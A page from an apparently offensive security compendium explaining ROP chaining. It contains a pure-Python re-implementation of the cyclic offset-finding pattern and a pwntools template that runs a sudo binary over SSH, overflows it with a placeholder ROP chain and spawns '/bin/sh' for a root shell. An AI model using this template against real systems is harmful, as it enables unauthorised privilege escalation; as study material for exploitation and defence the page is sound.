killchain-compendium/Exploits/Binaries/Ropping.md


# ROP Chaining

## Usage

- Find the cyclic buffer size (the offset to the saved return address)
- Find gadgets via ropper or, even better, ropstar
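
How the "find cyclic buffer size" step works, as an added example that is not the compendium's code and not part of ropper or ropstar: a small pure-Python re-implementation of the cyclic pattern and its reverse lookup. The lowercase alphabet and the 4-byte unique window are assumptions chosen to match pwntools' `cyclic()`/`cyclic_find()` defaults; `simulated_crash_offset` and its numbers are constructed for illustration.

```python
import string
from functools import lru_cache

# Assumptions (not from the page): lowercase alphabet and 4-byte unique
# windows, the defaults pwntools' cyclic()/cyclic_find() use.
ALPHABET = string.ascii_lowercase
WINDOW = 4


def de_bruijn(alphabet=ALPHABET, n=WINDOW):
    """Yield the de Bruijn sequence B(k, n) character by character: every
    string of length n over the alphabet occurs exactly once (FKM algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


@lru_cache(maxsize=None)
def full_pattern():
    """The whole sequence (26**4 = 456976 bytes), built once and cached."""
    return "".join(de_bruijn()).encode()


def cyclic(length):
    """First `length` bytes of the pattern, i.e. what cyclic(offset) on the page sends."""
    return full_pattern()[:length]


def cyclic_find(value):
    """Offset of a WINDOW-byte slice of the pattern. `value` is either the raw
    bytes read from the stack or the integer a debugger shows in a register,
    which is converted back to little-endian bytes first. Returns -1 if absent."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    return full_pattern().find(value[:WINDOW])


def simulated_crash_offset(buffer_len, saved_ret_offset):
    """Constructed illustration: `buffer_len` pattern bytes overrun a frame
    whose saved return address sits `saved_ret_offset` bytes into the buffer.
    The 8 bytes landing there are what the debugger shows; recover the offset."""
    payload = cyclic(buffer_len)
    word = payload[saved_ret_offset:saved_ret_offset + 8]
    return cyclic_find(int.from_bytes(word, "little"))


if __name__ == "__main__":
    print(cyclic(20))                       # b'aaaabaaacaaadaaaeaaa'
    print(cyclic_find(0x6161616b))          # 40
    print(simulated_crash_offset(200, 72))  # 72
```

Because every 4-byte window of the sequence is unique, the value that lands in a register or at the saved return slot identifies exactly one offset; the same lookup is what a crash-triage pipeline uses to decide whether a fuzzer-found overflow actually controls the return address, which is the question a stack canary or a bounds check is there to make moot.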

## Example

```python
from pwn import *

# Connect over SSH and start the target process (placeholders as in the original)
s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])

# Distance from the start of the buffer to the saved return address,
# found with cyclic()/cyclic_find()
offset = <found_offset_len>

# Take the ropchain from ropstar; the three values below are placeholders
payload = cyclic(offset)
payload += p64(0x4711)
payload += p64(0x235)
payload += p64(0x007)

print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline(b"/bin/sh")  # pwntools on Python 3 expects bytes here
p.interactive(prompt='')
```